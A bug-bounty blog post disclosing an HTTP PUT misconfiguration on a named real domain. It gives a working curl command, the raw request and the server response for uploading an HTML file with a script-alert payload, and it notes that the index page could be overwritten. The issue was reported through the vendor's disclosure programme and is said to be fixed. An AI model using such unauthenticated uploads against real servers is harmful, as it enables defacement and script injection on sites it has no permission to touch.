Howdy Readers,
During my random testing for my personal project toolkit for web application assessment, I found a very simple and very interesting vulnerability that allows me to easily pwn my target due to a HTTP method misconfiguration. The target has an HTTP PUT method-enabled vulnerability, and it was detected by Nuclei scan since one of the tools for my project toolkit is Nuclei from ProjectDiscovery.
What is the HTTP PUT method enabled?
HTTP PUT method allows clients to upload data to the server, often used for creating or modifying resources. If this method is enabled on a server or web application without proper restrictions or authentication, it can become a significant security vulnerability. Unauthorized users could potentially upload malicious files, overwrite existing files, or cause other forms of disruption.
So long story short. during my testing, I was able to upload a test HTML and text file for PoC, and it also allows me to overwrite the index file of the vulnerable target (easy deface).
Vulnerability Report:
Globe Telecom - wPT (Bug Bounty)
Title:
HTTP PUT Method enabled
Severity:
High
Category:
Code Injection
Affected:
https://resources.gcash.com/
Description:
HTTP PUT method allows clients to upload data to the server, often used for creating or modifying resources. If this method is enabled on a server or web application without proper restrictions or authentication, it can become a significant security vulnerability. Unauthorized users could potentially upload malicious files, overwrite existing files, or cause other forms of disruption.
Recommendations:
• The best practice is to disable the HTTP PUT method entirely unless explicitly needed for specific use cases, especially on publicly accessible servers.
• If the PUT method must be enabled, ensure that it is restricted to authenticated and authorized users only.
• If file uploads are required via the PUT method, ensure that proper input validation is in place.
Evidence:
It was found that the affected target has a HTTP PUT Method enabled vulnerability. It allows attacker to modify or replace important files, which could lead to loss of data integrity, tampered configurations, or broken applications.
Steps to Reproduce:
1. Execute the following command (curl --path-as-is -i -s -k -X $'PUT' \ -H $'Host: resources.gcash.com' -H $'Content-Type: text/html'\ --data-binary $'\x0d\x0a<h1>\x0d\x0apwned by evan (@evanricafort)\x0d\x0a</h1>\x0d\x0a<script>alert(\"pwned!\")</script>' \ $'https://resources.gcash.com/test-evan.html').
2. Go to your uploaded file.
3. Check and verify the vulnerability.
Live Demo: https://resources.gcash.com/test-evan.html
Request:
PUT /test-evan.html HTTP/2
Host: resources.gcash.com
Content-Type: text/html
Content-Length: 78
<h1>
pwned by evan (@evanricafort)
</h1>
<script>alert("pwned!")</script>
Response:
HTTP/2 200 OK
Date: Sun, 12 Jan 2025 19:06:37 GMT
Content-Length: 0
Server: istio-envoy
Etag: "XXX"
Cache-Control: max-age=31536000
X-Envoy-Upstream-Service-Time: 45
X-Kong-Upstream-Latency: 44
X-Kong-Proxy-Latency: 1
Via: kong/3.0.1.0-enterprise-edition
X-Kong-Deployment: wc-v5-29-fe
The vulnerability was reported directly to Globe Telecom via their VDP, and they already fixed the issue without giving any feedback/response to the report.
Man... It's 2025, and I still can't believe I've been doing this thing (bug bounty). I hope you find this article interesting and useful.
Reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
"Never let the fear of striking out keep you from playing the game."
– Babe Ruth
No comments:
Post a Comment